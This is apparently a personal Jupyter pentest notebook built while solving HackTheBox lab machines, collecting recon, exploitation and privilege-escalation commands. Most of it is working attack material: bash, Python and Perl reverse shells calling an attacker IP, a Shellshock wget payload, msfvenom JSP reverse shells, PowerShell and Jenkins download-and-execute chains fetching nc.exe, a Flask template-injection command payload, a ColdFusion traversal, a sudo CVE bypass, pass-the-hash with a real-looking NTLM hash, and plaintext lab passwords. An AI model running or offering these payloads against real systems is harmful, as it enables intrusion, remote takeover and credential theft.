# myHack the Notebook
This notebook lists various tactics and techniques used in pentesting.

Created the notebook as I worked through various machines from hackthebox and other locations/sites

## Global Settings

In [1]:
# Box Information
nickname = "ypuffer"        
dnsName = "docker.registry.htb"
destDNS = dnsName
destIP = '10.10.10.107'

vpnIP = "10.10.14.19"

# SSH Configuration
# doctors.htb
import paramiko
sshport = 22
username = "xalvas"
password = "18547936..*"
sshKey="/home/kali/hackthebox/output/traverxec/id_rsa"

# WinRM Configuration
winrmpass = winrmpassword = "Thestrokes23"

####
# Create the Output Directory for the Below Information Gathered
currentDir = "/home/kali/hackthebox"
outputDir = currentDir + "/output"
print("Output Directory:" + outputDir)
!mkdir -p $outputDir

# Create directories for the box
boxDir = outputDir + "/" + nickname
print("Box Directory:" + boxDir)
!mkdir -p $boxDir

Output Directory:/home/kali/hackthebox/output
Box Directory:/home/kali/hackthebox/output/ypuffer


<a id="index"></a>
## Index

#### Steps of Penetration Testing
````
1. Reconnaissance
2. Assess Vulnerabilities
3. Exploit
4. Maintain Access
5. Privilege Escalate
6. Maintain Elevated Access
7. Lateral Movement
8. Artifact Collection
9. Reporting
````


### Reconnaissance

[dirb](#dirb)

[ffuf](#ffuf)

[gobuster](#gobuster)

[nikto](#nikto)

[nmap Port Scan Quick](#nmap)

[nmap Port Scan UDP](#nmapudp)

[nmap Discover Versions](#nmapsv)

[nmap all the ports](#nmapall)

[smbclient](#smbclient)

[snmpwalk](#snmpwalk)



### Assess Vulnerabilities

[nmap scripts default and safe](#nmapscripts)



### Exploit

[bash Reverse Shell](#bashreverse)

[curl (GET)](#curlget)

[Impacket - GetNPUsers](#getnpusers)

[john the ripper](#john)

[LDAP Search](#ldapsearch)

[ltrace](#ltrace)

[metasploit multi-handler](#multihandler)

[msfvenom payloads](#msfvenom)

[Perl Commands Reverse Shell](#perl)

[Powershell Download](#powerget)

[Python Upgrade Shell](#pythonu)

[Python Reverse Shell](#python)

[sqlmap](#sqlmap)

[SQL Injection](#sqlinject)

[smbmount](#smbmount)

[SSH Paramiko (Execute Commands)](#sshp)

[SSH Paramiko (Copy Files)](#sshpcopy)

[SSH Paramiko (Execute Linpeas)](#sshp-peas)

[SSH Paramiko (Linux Exploit Suggester)](#sshp-suggest)

[wget (GET)](#wgetget)

[WinRM](#winrm)



### Maintain Access (Pesistance - User Level)



### Privilege Escalate

[Enumerating SUID Binaries](#findsuid)

[Linux privesc](#linuxprivesc)

[SSH Paramiko (Run Linpeas)](#sshp-peas)

[SSH Paramiko (Linux Exploit Suggester)](#sshp-suggest)

[Windows privesc](#windowsprivesc)



### Maintain Elevated Access (Persistance - Root Level)



### Lateral Movement



### Artifact Collection

[ Stego with steghide](#stego)


### Reporting



### Additional Notes for Specific Scenarios

[rpcinfo and showmount for NFS Shares](#rpcinfo)

[Flask Debug Console](#flaskdebug)

[Flask Template Injection](#flasktemplate)

[Jenkins Script Console](#jenkins)

less - Execute commands from inside of less by ! followed by the command

mysql - Execute commands from inside of mysql with \! followed by the command

[JWT Token Manipulation](#jwttoken)



### Notebooks for Specific Scenarios

[ Interaction with PHP Shell ](./Linux_Add_Persistance.ipynb)

[ gdb Linux Binary Exploitation ](./gdbLinuxBinaryExploitation.ipynb)

<a id="nmap"></a>
## nmap 
Very quick scan to discover open ports

[Back to Index](#index)

Command: nmap -p- --min-rate=1000 -T4 --ipaddr-- -oN nmap

In [ ]:
outputLocation = boxDir + '/nmap.txt'
#!nmap -p- --min-rate=1000 -T4 $destIP -oN $outputLocation
!nmap -Pn -p- --min-rate=1000 -T4 $destIP -oN $outputLocation
f = open(outputLocation)
openPortsList = []
for line in f:
    if "/tcp" in line:
        items = line.split("/")
        openPortsList.append(items[0])
strOpenPorts = ""
for port in openPortsList:
    strOpenPorts += port + ","
strOpenPorts = strOpenPorts[:-1]
#print(strOpenPorts)

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-28 23:59 EST


<a id="nmapudp"></a>
## nmap UDP
Very quick scan to discover open ports

[Back to Index](#index)

In [ ]:
# Requires root privileges
outputLocation = boxDir + '/nmapUDP.txt'
print("sudo nmap -sU -F --max-retries 0 " + destIP + " -oN " + outputLocation)

<a id="nmapsv"></a>
## nmap -sV 
Discovers the version of the services running if available

[Back to Index](#index)

Command: nmap -sV --ipaddr-- -oN nmapsv

In [ ]:
outputLocation = boxDir + '/nmapsv.txt'
#!nmap -Pn -sV $destIP -oN $outputLocation
!nmap -Pn -p$strOpenPorts -sV $destIP -oN $outputLocation

<a id="nmapall"></a>
## nmap All TCP ports

[Back to Index](#index)

Command: nmap -sV -p- --ipaddr-- -oN nmap

In [ ]:
# Not necessary now...
outputLocation = boxDir + '/nmapAll.txt'
!nmap -sV -p- $destIP -oN $outputLocation

<a id="nmapscripts"></a>
## nmap scripts default,safe

[Back to Index](#index)

Command: nmap -sV --scripts default,safe --ipaddr-- -oN nmapScripts

In [ ]:
outputLocationScripts = boxDir + '/nmapScripts.txt'
#!nmap -p80 -Pn -sV --script default,safe $destIP -oN $outputLocationScripts
!nmap -p$strOpenPorts -Pn -sV --script default,safe $destIP -oN $outputLocationScripts

In [ ]:
# Shellshock Check
#!nmap -sV -p- --script http-shellshock $destIP
!nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls $destIP

<a id="nikto"></a>
## nikto

[Back to Index](#index)

In [ ]:
### nikto settings
outputLocationNikto = boxDir + "/nikto.csv"
url="http://" + dnsName
!nikto -h $destIP -o $outputLocationNikto -p 80
#!nikto -h $url -o $outputLocationNikto

# Below is how to scan multiple ports
#!nikto -h $destIP -o $outputLocation -p 80,443  

<a id="stego"></a>
## Stego with Steghide

[Back to Index](#index)

````
steghide --extract -p --password-- -sf --file--
````

<a id="dirb"></a>
## dirb

[Back to Index](#index)

In [ ]:
### dirb settings
outputLocationDirb = boxDir + "/dirb.txt"
outputLocationDirbSubD = boxDir + "/dirb-subdir.txt"
#url="http://" + dnsName
url="http://" + destIP
#url = "http://" + destIP + ":50000"
wordlist="/usr/share/wordlists/dirb/common.txt"
#wordlist="/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt"
# -w does not stop on warning messages
!dirb $url $wordlist -w -o $outputLocationDirb
subdir = url + "/cgi-bin/"
# -X search for files with the extension of sh 
#!dirb $subdir -X .sh -o $outputLocationDirb

#!dirb $url -o $outputLocationDirb

<a id="gobuster"></a>
## gobuster

[Back to Index](#index)

In [ ]:
# gobuster is not installed by default on kali (apt install gobuster)
outputLocationGoBuster = boxDir + "/gobuster.txt"
url="http://" + destIP
wordlist="/usr/share/wordlists/dirb/common.txt"
# -x is a comma seperated list of extensions to test
!gobuster dir -u $url -w $wordlist -x txt,pdf,php --wildcard
#!gobuster dir -u $url -w $wordlist

<a id="ffuf"></a>
## ffuf
Faster than dirb...

[Back to Index](#index)

In [ ]:
# ffuf is not installed by default on kali (apt install ffuf)
outputLocationGoBuster = boxDir + "/ffuf.txt"
url="http://" + destIP + "/FUZZ"
print(url)
wordlist="/usr/share/wordlists/dirb/common.txt"
!ffuf -u $url -w $wordlist

<a id="smbclient"></a>
## smbclient

[Back to Index](#index)


In [ ]:
!smbclient -L $destIP -U anonymous --no-pass

<a id="smbmount"></a>
## smbmount

[Back to Index](#index)


In [ ]:
# smbmount /////--ipaddr or name--//share --folder--

<a id="curlget"></a>
## curl (GET)

[Back to Index](#index)

In [ ]:
# The following command is a directory traversal on CFIDE to get the administrator password
#curlURL = "http://" + destIP 
curlURL = "http://" + destIP + ":8500" + "/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en"
#!curl -X GET $curlURL
resultsCurl = !curl -X GET $curlURL
for line in resultsCurl:
    if "password" in line:
        print(line)

In [ ]:
# Challenge Emdee five for life
# Completed
import re
import requests
import hashlib

curlURL = "http://178.128.40.63:32544/"
# GET Results
print("GET Results")
getResults = requests.get(curlURL, stream=True)
phpSessionString = getResults.headers['Set-Cookie']
phpSessionString = re.sub("PHPSESSID=","", phpSessionString)
phpSessionString = re.sub(";.+","", phpSessionString)
print("PHP Session: " + phpSessionString)
savedResults = ""
for line in getResults.iter_lines():
    line = line.decode("utf-8")
    savedResults += line + "\n"
    if "MD5 en" in line:
        line = re.sub(".+<h3 align='center'>", "", line)
        line = re.sub("</h3>.+", "", line)
        print("Line in File: " + line)
        strLine = line
strHash = hashlib.md5(strLine.encode("utf-8")).hexdigest()
print("Hash Submitted: " + strHash)
print("\n-----------Results--------------")
print(savedResults)
print("--------------------------------\n\n")

# POST Results
count = 1
while (count < 5):
    print("\nPOST Results - " + str(count))
    postObj = {'hash': strHash}
    cookies = {'PHPSESSID': phpSessionString}
    results = requests.post(curlURL, data = postObj, cookies=cookies, stream=True)
    phpSessionStringPOST = results.headers
    #phpSessionString = re.sub("PHPSESSID=","", phpSessionString)
    #phpSessionString = re.sub(";.+","", phpSessionString)
    print("POST PHP Session: " + str(phpSessionStringPOST))
    savedResults = ""
    for line in results.iter_lines():
        line = line.decode("utf-8")
        savedResults += line + "\n"
        if "MD5 en" in line:
            line = re.sub(".+<h3 align='center'>", "", line)
            line = re.sub("</h3>.+", "", line)
            print("Line in File: " + line)
            strLine = line
    strHash = hashlib.md5(strLine.encode("utf-8")).hexdigest()
    print("Hash Submitted: " + strHash)
    print("\n-----------Results--------------")
    print(savedResults)
    print("--------------------------------\n\n")
    count += 1

        

#### curl (POST)

In [ ]:
!curl -d "xyz=ls" -X POST http://192.168.113.169/test/.cache.php

#### curl (Authorization Basic Header)

In [ ]:
curlURL = "http://" + destDNS + "/v2"
# Reference: Registry
apiFunction = "/_catalog"  # bolt-image
apiFunction = "/bolt-image/tags/list" # boltimage latest
apiFunction = "/bolt-image/manifests/latest" 
# You can download the blobSum for the images - Search and Plunder
# Password found from below... GkOcz221Ftb3ugog
#apiFunction = "/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
apiFunction = "/bolt-image/blobs/sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
page = curlURL + apiFunction
basicAuth = 'Authorization: Basic YWRtaW46YWRtaW4='

#print("!curl " + page + " -H '" + basicAuth + "'")
#!curl $page -H 'Authorization: Basic YWRtaW46YWRtaW4='

# To save output
!curl $page -H 'Authorization: Basic YWRtaW46YWRtaW4=' -o $boxDir/f476d6.gz
!cat $boxDir/list.txt

<a id="wgetget"></a>
## wget (GET)

[Back to Index](#index)

In [ ]:
# Shellshock with reverse shell - Found the user.sh file using dirb
wget -U "() { :;}; echo Content-Type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.4/4545 0>&1" http://10.10.10.56/cgi-bin/user.sh

<a id="powerget"></a>
## Powershell (GET)

[Back to Index](#index)

Newer versions of powershell support the Invoke-Webrequest
````
$url = "http://10.10.14.3:8090/Chimichurri.exe"
$output = "c.exe"
Invoke-WebRequest -Uri $url -OutFile $output
````

With older versions of powershell you need to use .NET
````
$w = New-Object System.Net.WebClient
$url = "http://10.10.14.10:8090/file.exe"
$output = "output.exe"
$w.DownloadFile($url, $file)
````
The above options can be bundled into a ps1 file and executed.

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

<a id="john"></a>
## John the Ripper

[Back to Index](#index)

In [ ]:
### Output Location
outputLocationJohn = boxDir + "/hash.txt"
saveFile = boxDir + "/john.output"
# Kerberos hashes from Impacket NPUsers does not load properly below, manually load to hash.txt
#hash='$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:c5fcbfe4f219b5dd5f8634bd4d67a9d0$99493b26fcd0da4d002167e6d3a55fdaf34ff7371eb335be2a5869f33b771351a1051ce3e8585a20ccbbd440a88ed7d7ba63dcbfc61fae67dc31331b106a2a84fbc299d8ff5f60b017b7b182d3712133d6cf31de66f5ee2ed572fdbbfd8c99330d4065e66438b1e6ba6322da2ddc15c23e234aa0fc82ed349e8a48e2525d1f766fddfd859386e2e333c4a7cdecae6a7a182b3113b05706038c94007f1016d9a69a1ed079ceef8377bce3cbde6b8967f9139b8038a5bc5981ce17101daa427959ca5ccbef9afa153af4743b8024052347be335bba1c986c26572ce935844f08ee34358a6f4d33ef5bb9495f350f99b863a69dd8fb18206f7c1d5a8100bae19ef7'
#!echo $hash > $outputLocationJohn
# Display the file with the hash in it
#!cat $outputLocationJohn

# Using Default John wordlist
#!/usr/sbin/john $outputLocationJohn > $saveFile

# Using Rockyou or a selected wordlist
!/usr/sbin/john -wordlist=/usr/share/wordlists/rockyou.txt $outputLocationJohn > $saveFile
!cat $saveFile

#### Extract password hash from id_rsa private key
A warning appears as if it did not work
````
python3 /usr/share/john/ssh2john.py id_rsa > hash.txt
Execute john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
````

<a id="msfvenom"></a>
## msfvenom payload Creation

[Back to Index](#index)

Reference: https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

Create an executable that can be run as a windows service to start a bind shell
````
msfvenom -p windows/x64/meterpreter/bind_tcp lport=8090 -f exe-service
````

Schedule Task on Coldfusion 8
````
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=8090 -f raw > cold.jsp
````

In [ ]:
outputLocationPayload = boxDir + "/payload.jsp"
!msfvenom -p  java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=8090 -f raw > $outputLocationPayload

<a id="pythonu"></a>
## Python Commands (Upgrade Shell)

[Back to Index](#index)

In [ ]:
print("python -c \"import pty; pty.spawn('/bin/bash')\"")

<a id="python"></a>
## Python Commands (Reverse Shell)

[Back to Index](#index)

````
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",8091));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  
````

Using the above in conjunction with wget to have a reverse shell
````
wget 10.10.14.14/htb/t.py -O /tmp/t.py; python /tmp/t.py
````


In [ ]:
reverseshellPort = "8090"
print("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + vpnIP + "\"," + reverseshellPort + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")

<a id="bashreverse"></a>
## Bash (Reverse Shell)

[Back to Index](#index)

In [ ]:
reverseshellPort = 8090
b64 = !echo "/bin/bash -i >& /dev/tcp/$vpnIP/$reverseshellPort 0>&1" | base64
#cmd = "AB; echo " + b64[0] + " | base64 -d | bash' "
cmd = "echo " + b64[0] + " | base64 -d | bash"
print (cmd)

In [ ]:
reverseshellPort = 8090
print("/bin/bash -i >& /dev/tcp/" + vpnIP + "/" + str(reverseshellPort) + " 0>&1")

<a id="perl"></a>
## Perl Commands (Reverse Shell)

[Back to Index](#index)

In [ ]:
# For commands through a shell using perl (with sudo privileges)
# sudo /usr/bin/perl -e 'exec "cat /root/root.txt"'

# The below spawns nc as root - Had to download /usr/bin/nc from kali due to a different version on the box
# sudo /usr/bin/perl -e 'exec "/home/shelly/nc 10.10.14.4 8090 -e /bin/bash"'

# Perl Reverse Shell
# Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# sudo perl -e 'use Socket;$i="10.10.14.4";$p=4500;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

<a id="multihandler"></a>
## Metasploit Multi-Handler Setup

[Back to Index](#index)

Setup: Creates a multihandler file for a metasploit payload being executed or other payload that could connect back

In [ ]:
port=8090
outputLocationmhandler = boxDir + "/mhandler.rc"
f = open(outputLocationmhandler, 'w')
f.write("use exploit/multi/handler")
f.write("set payload windows/x64/meterpreter/bind_tcp")
f.write("set RHOSTS " + destIP)
f.write("set RPORT " + str(port))
f.close()

print("Execute to Start: msfconsole -r " + outputLocationmhandler)

<a id="sshp"></a>
## SSH Paramiko (Execute Commands)

### Creates a journal file that can be viewed

[Back to Index](#index)

In [ ]:
#commandList = ['uname -a']
commandList = ['whoami', 'uname -a', 'ps -aef --forest', 'netstat -anop', 'cat /etc/passwd', 'cat /etc/crontab', 'ls -lhaR /var/www']
#commandList = ['cat /var/www/html/backup.php']
#commandList += ['ls -lha /var/www/html/bolt']

# To investigate a process use the below...
processID = "1225"
pcmd = "ls -la /proc/" + processID + "/cwd"
pcmd2 = "ss -anp | grep " + processID
#commandList = [pcmd, pcmd2] 

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Below is used with a password
#ssh.connect(destIP, sshport, username, password)

# Below is used with a SSH key
# By default the key generated is OPENSSH convert to RSA by ssh-keygen -p -m PEM -f ~/.ssh/id_rsa
ssh.connect(hostname=destIP, username=username, password=password, key_filename=sshKey)

# Record output in journal
outputLocationJournal = boxDir + "/journal.txt"
f = open(outputLocationJournal, 'a')
for c in commandList:
    stdin, stdout, stderr = ssh.exec_command(c)
    jlines = stdout.readlines()
    #print(jlines)
    print("\nCommand: " + c)
    print("Output")
    for j in jlines:
        print(j.strip())

    f.write("\n\nCommand: " + c)
    f.write("\nOutput\n")
    for jline in jlines:
        f.write(jline)
f.close()

### View Journal

In [ ]:
!cat $outputLocationJournal

### Roll Journal  (Warning clears Journal)

In [ ]:
outputLocationArchive = boxDir + "/journal_archive.txt"
!touch $outputLocationArchive
!cat $outputLocationArchive $outputLocationJournal > $outputLocationArchive
!rm $outputLocationJournal

<a id="sshpcopy"></a>
## SSH Paramiko (Copy Files)

[Back to Index](#index)

In [ ]:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Below is used with a password
#ssh.connect(destIP, sshport, username, password)

# Below is used with a SSH key
# By default the key generated is OPENSSH convert to RSA by ssh-keygen -p -m PEM -f ~/.ssh/id_rsa
ssh.connect(hostname=destIP, username=username, key_filename=sshKey)

sftp=ssh.open_sftp()
# Downloading from remotefilepath to localfilepath
sftp.get('/etc/passwd', boxDir + "/passwd")
#sftp.close()

# Uploading from localfilepath to remotefilepath
sftp.put('/var/www/html/htb/s.txt', '/home/help/s.txt')
sftp.close()

print("Completed the command")

<a id="sshp-peas"></a>
## SSH Paramiko (Execute Linpeas)

[Back to Index](#index)

In [ ]:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Below is used with a password
#ssh.connect(destIP, sshport, username, password)

# Below is used with a SSH key
# By default the key generated is OPENSSH convert to RSA by ssh-keygen -p -m PEM -f ~/.ssh/id_rsa
#ssh.connect(hostname=destIP, username=username, key_filename=sshKey)
ssh.connect(hostname=destIP, username=username, password=password, key_filename=sshKey)

sftp=ssh.open_sftp()
# Uploading from localfilepath to remotefilepath
linpeasDir='/home/david'
sftp.put('/var/www/html/htb/linpeas.txt', linpeasDir + '/mypeas.sh')

command = 'chmod 700 ' + linpeasDir + '/mypeas.sh'
stdin, stdout, stderr = ssh.exec_command(command)

command = linpeasDir + '/mypeas.sh > ' + linpeasDir + '/mypeas.txt'
stdin, stdout, stderr = ssh.exec_command(command)
# Wait for the command to finish - By default paramiko will not wait
exit_status = 1
while exit_status != 0:
    exit_status = stdout.channel.recv_exit_status()
print(exit_status)
    
# Downloading the linpeas output
sftp.get(linpeasDir + '/mypeas.txt', boxDir + "/mypeas.txt")

# Remove the linpeas files
commandList = ['rm -f ' + linpeasDir + '/mypeas.txt']
commandList += ['rm -f ' + linpeasDir + '/mypeas.sh']
for c in commandList:
    stdin, stdout, stderr = ssh.exec_command(c)


sftp.close()
print("Completed the execution of Linpeas")

<a id="sshp-suggest"></a>
## SSH Paramiko (Linux Exploit Suggester)

[Back to Index](#index)

In [ ]:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Below is used with a password
#ssh.connect(destIP, sshport, username, password)

# Below is used with a SSH key
# By default the key generated is OPENSSH convert to RSA by ssh-keygen -p -m PEM -f ~/.ssh/id_rsa
ssh.connect(hostname=destIP, username=username, key_filename=sshKey)

sftp=ssh.open_sftp()
# Uploading from localfilepath to remotefilepath
lesDir='/home/help'
sftp.put('/var/www/html/htb/linux-exploit-suggester.txt', lesDir + '/les.sh')

command = 'chmod 700 ' + lesDir + '/les.sh'
stdin, stdout, stderr = ssh.exec_command(command)

command = lesDir + '/les.sh > ' + lesDir + '/les.txt'
stdin, stdout, stderr = ssh.exec_command(command)
# Wait for the command to finish - By default paramiko will not wait
exit_status = 1
while exit_status != 0:
    exit_status = stdout.channel.recv_exit_status()
print(exit_status)
    
# Downloading the linpeas output
sftp.get(lesDir + '/les.txt', boxDir + "/linux-exploit-suggester.txt")

# Remove the linpeas files
commandList = ['rm -f ' + lesDir + '/les.txt']
commandList += ['rm -f ' + lesDir + '/les.sh']
for c in commandList:
    stdin, stdout, stderr = ssh.exec_command(c)


sftp.close()
print("Completed the execution of Linux Exploit Suggester")

<a id="winrm"></a>
## Windows Remote Management WinRM

[Back to Index](#index)

In [ ]:
# Settings 
winrmusername = "fsmith"
winrmpassword = "Thestrokes23"

#poshCommand = "Get-Location"
#poshCommand = "whoami; whoami /groups; whoami /priv"

# Download a file
# Sharphound Locations: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# Takes a while for the command to complete based on the size of the file
poshCommand = "Invoke-WebRequest -Uri http://10.10.14.10:8090/SharpHound.ps1 -Outfile SharpHound.ps1"
# Step 2 of Sharphound
poshCommand2 = "Import-Module .\SharpHound.ps1"
# Step 3 of Sharphound
poshCommand3 = "Invoke-BloodHound -CollectionMethod All"
# Step 4 is to Copy the file from a remote session...
#Copy-Item -Path c:\users\svc-alfresco\Documents\20201030201503_BloodHound.zip -Destination . -FromSession $s

# Gather users flag on hackthebox
#poshCommand = "Get-Content -Path c:\\users\\" + winrmusername + "\\Desktop\\user.txt"

scriptPath = boxDir + "/ps.ps1"
f = open(scriptPath, "w")
f.write("#!/usr/bin/pwsh\n")
f.write("$pw = Convertto-Securestring -AsPlainText -Force -String \"" + winrmpassword + "\"\n")
f.write("$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist \"" + winrmusername + "\",$pw" + "\n")
f.write("$s = New-PSSession -Computername " + destIP + " -Authentication Negotiate -Credential $cred\n")
# Enterpssession $s is a manual way
f.write("Invoke-Command -Session $s {" + poshCommand + "}\n")
f.write("Invoke-Command -Session $s {" + poshCommand2 + "}\n")
f.write("Invoke-Command -Session $s {" + poshCommand3 + "}\n")
f.close()

!chmod 700 $scriptPath
!$scriptPath

print("Completed Commands!")

## User powershell to write logs to event viewer: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/write-eventlog?view=powershell-5.1


<a id="rpcinfo"></a>
## rpcinfo and showmount for NFS shares

[Back to Index](#index)

````
rpcinfo -p --ipaddr--
showmount -e --ipaddr--
mount --ipaddr--:--directoryshared-- /mountpoint
````

<a id="ldapsearch"></a>
## ldapsearch

[Back to Index](#index)

ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=htb,dc=local"

** This is only allowed if you do not have to authenticate to the domain

?? What do you do when you have to authenticate to the domain? How does the command change?

In [ ]:
outputLocationLDAP = boxDir + "/ldapsearch.txt"
domain="dc=egotistical-bank,dc=local"
!ldapsearch -h $destIP -p 389 -x -b $domain > $outputLocationLDAP
!cat $outputLocationLDAP

### Generate List of Sam Accounts
Parse the LDAP Information for a list of Sam Accounts

Modify after the output occurs to remove unnecessary groups, etc.

Note: This may not return some accounts like service accounts In hackthebox the machine Forest, it does not return svc-alfresco.

In [ ]:
outputLDAPUserList= boxDir + "/userLDAP.txt"
!cat $outputLocationLDAP | grep -e sAMAccountName > $outputLDAPUserList
!sed -i 's/sAMAccountName:\s//' $outputLDAPUserList

<a id="ltrace"></a>
## ltrace

[Back to Index](#index)

Use ltrace to view a verbose of the execution of a file (be careful of the execution of malware)
````
./ltrace --file--
````

<a id="getnpusers"></a>
## Impacket - GetNPUsers

[Back to Index](#index)

If Kerberos Pre-Authentication is Disabled a hash will be returned.  A user account list can be passed to check this...

Here is some powershell to check if you have privileges: 
````
get-aduser -filter * -properties DoesNotRequirePreAuth | where {$._DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
````

The location of impacket may vary!

In [ ]:
!locate GetNPUsers

In [ ]:
# Install impacket if this is the first time running GetNPUsers
!pip install impacket

# pyasn1 may not be installed also
!pip install pyasn1

#### Location of GetNPUsers
Set the location of the script below

##### You need to generate a users.txt file to use in the enumeration

In [ ]:
locationGetNPUsers="/usr/share/doc/python3-impacket/examples/GetNPUsers.py"
outputUsersTXT= boxDir + "/users.txt"
# Make sure the domain is updated in the global settings
domain = dnsName + "/"
# After creating users.txt file - verify it exists
!cat $outputUsersTXT

In [ ]:
locationNPUsers= boxDir + "/npusers.txt"
# Modified the below command to use python3
!python3 $locationGetNPUsers -dc-ip $destIP $domain -usersfile $outputUsersTXT -format john > $locationNPUsers
!cat $locationNPUsers

<a id="getadusers"></a>
## Impacket - GetADUsers

[Back to Index](#index)

In [ ]:
locationGetADUsers="/usr/share/doc/python3-impacket/examples/GetADUsers.py"
saveADUsers= boxDir + "/ADusers.txt"
domain = dnsName + "/"
!python3 $locationGetADUsers $domain -dc-ip $destIP


# psexec - pass the hash
# psexec.py egotistical-bank/administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff


<a id="findsuid"></a>
## Enumerate SUID Binaries

[Back to Index](#index)

find / -type f -perm -4000 2>/dev/null

<a id="linuxprivesc"></a>
## Linux privesc

[Back to Index](#index)

LinEnum - https://github.com/rebootuser/LinEnum

LinPeas - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

Linux Exploit Suggester - https://github.com/mzet-/linux-exploit-suggester


#### sudo

Check on sudo -l for programs that can be executed with those permissions


#### sudo -V if version 1.8.25p1
CVE-2019-14287 sudo -u#-1 /bin/bash


#### docker mount host root filesystem to image to escalate to see root files
Reference: https://chr0x6eos.github.io/2020/10/10/htb-Cache.html   
docker run -v /:/mnt/rootfs -it ubuntu

<a id="windowsprivesc"></a>
## Windows privesc

[Back to Index](#index)

Windows Exploit Suggester
````
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Download to your pentest box
# Download from Microsoft a list of the updates to check against
./windows-exploit-suggester.py --update
Downloaded the following file: 2020-12-02-mssb.xls
On the windows computer execute systeminfo and copy into systeminfo.txt on pentest box
# Upgrade xlrd to read the xls file
pip install xlrd --upgrade
./windows-exploit-suggester.py --database 2020-12-02-mssb.xls --systeminfo systeminfo.txt
````

References: https://github.com/egre55/windows-kernel-exploits

In [ ]:
# Download Windows-Exploit-Suggester Updated


<a id="flaskdebug"></a>
## Flask Debug Console

[Back to Index](#index)

````
import subprocess
p = subprocess.check_output('whoami', shell=True)
print(p.decode('utf-8'))
````

<a id="flasktemplate"></a>
## Flask Template Injection (SSTI)

[Back to Index](#index)

References: https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee

In [ ]:
# http://url/{{7 * 7}}  - Example test
# {{ config.items() }} - Look at the configuration
# {{ ''.__class__.__mro__ }} - Method resolution order
# 414 is the location of the subprocess.Popen function
# {{''.__class__.__mro__[1].__subclasses__()[414]('ls -lha',shell=True,stdout=-1).communicate()}}

<a id="jenkins"></a>
## Jenkins Console

[Back to Index](#index)

````
Try and find the scripts console http://:5000/<page>/script

In the console you can execute commands with the following...

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c dir'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
````

Reference: https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password

For powershell download a file locally to execute
````
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c echo $wc=New-Object System.Net.WebClient;$url="http://10.10.14.18:8090/nc.exe";$file="o.exe";$wc.DownloadFile($url,$file) > s.ps1'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

````

Verify the file written
````
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type s.ps1'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
````

Execute the powershell file to download the nc.exe rename to o.exe
````
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File s.ps1'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
````

Execute o.exe for the reverse shell 
````
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c o.exe 10.10.14.18 8090 -e cmd.exe'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
````

## metasploit psexec

````
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhost 10.10.10.63
rhost => 10.10.10.63
msf5 exploit(windows/smb/psexec) > set rport 445
rport => 445
msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.10.10.63      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
